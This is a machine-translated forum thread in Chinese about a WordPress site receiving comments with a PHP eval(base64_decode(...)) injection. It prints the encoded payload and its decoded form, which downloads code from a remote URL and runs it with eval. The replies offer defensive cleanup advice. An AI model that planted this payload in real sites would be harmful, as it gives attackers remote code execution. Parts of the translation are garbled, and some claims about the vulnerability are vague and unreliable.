Php Eval Base64病毒Wordpress

我今天在使用wordpress博客，我得到了这样的评论

<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --&gt;<!--/mfunc-->

---

我收到很多这样的评论。有人能帮我解决这个问题吗。？这是黑客行为还是黑客行为的开始

我在寻找一个好的、快速的解决方案。这将帮助您找到哪些文件感染了eval64。然后，您可以在Dreamweaver中使用搜索/替换，并一次将其从所有文件中删除

但是

有一个索引文件，包含短2行代码。那两条线一次又一次地注入eval。我忘了是哪个index.php，但请查看文件夹：

• wp管理员
• 可湿性粉剂含量
• 可湿性粉剂包括

尝试使用Dreamweaver在文件中搜索md5

---

希望您能够修复它。

这是一次黑客攻击或至少是一次尝试。他们正在利用一个未解决的wordpress漏洞，该漏洞允许他们下载和执行代码。目前，这种类型的攻击在网络上几乎没有公开曝光，如果它是由受过教育的来源发起的，可能会特别恶劣。如果您在服务器端发现了这些类型的代码片段，请进行更多的研究，以确定您是否真的受到感染，如果是，感染的程度到底有多高。我已经看到整个共享主机服务器被wordpress站点管理员感染，他们要么允许通过无知，要么积极帮助这个问题传播。不幸的是，这个特殊的问题目前还没有很好的记录在网络上，所以你可能要做一个很好的研究，以确保你的网站是好的。为了帮助您进行研究，我将澄清此黑客的术语

---

这是一种PHP代码注入攻击，很可能试图利用wordpress框架中的已知漏洞进行攻击。它使用Base64编码的PHP代码通过

eval（）

将自身注入宿主服务器，这是一种编程语言结构，几乎存在于所有编程语言中，包括PHP。具有高度组织能力和先进能力的黑客最近利用此漏洞对受损的wordpress网站造成了严重破坏，因此在处理此类问题时要格外小心

这些建议对我们都不起作用。以下是我们如何从多个wordpress站点中删除恶意代码而不停机

我们遇到了一个问题，多个旧wordpress站点共享一个被该病毒渗透的文件系统

我们最后编写了一个小python脚本来遍历文件系统并检测恶意代码

以下是供感兴趣的人使用的代码（注意：使用时自担风险）：

该脚本将扫描文件系统中的恶意内容，并作为一个单独的命令尝试删除base64 eval函数

这实际上是一个临时解决方案，因为该病毒的生成器使用PHP注释导致正则表达式不匹配。最后，我们使用

auditd

监视哪些文件正在写入我们知道已感染的文件：

---

一旦我们找到了病毒的产生者，又删除了一个

eval_scriber

，然后我们的问题就解决了。

尽早备份您的数据这看起来像是一次黑客尝试，但是如果您使用的是标准的Wordpress主题和评论系统，那么您应该很好-您的服务器可能没有执行该PHP。您有任何理由相信它实际上正在您的服务器上运行吗？

$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);

pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .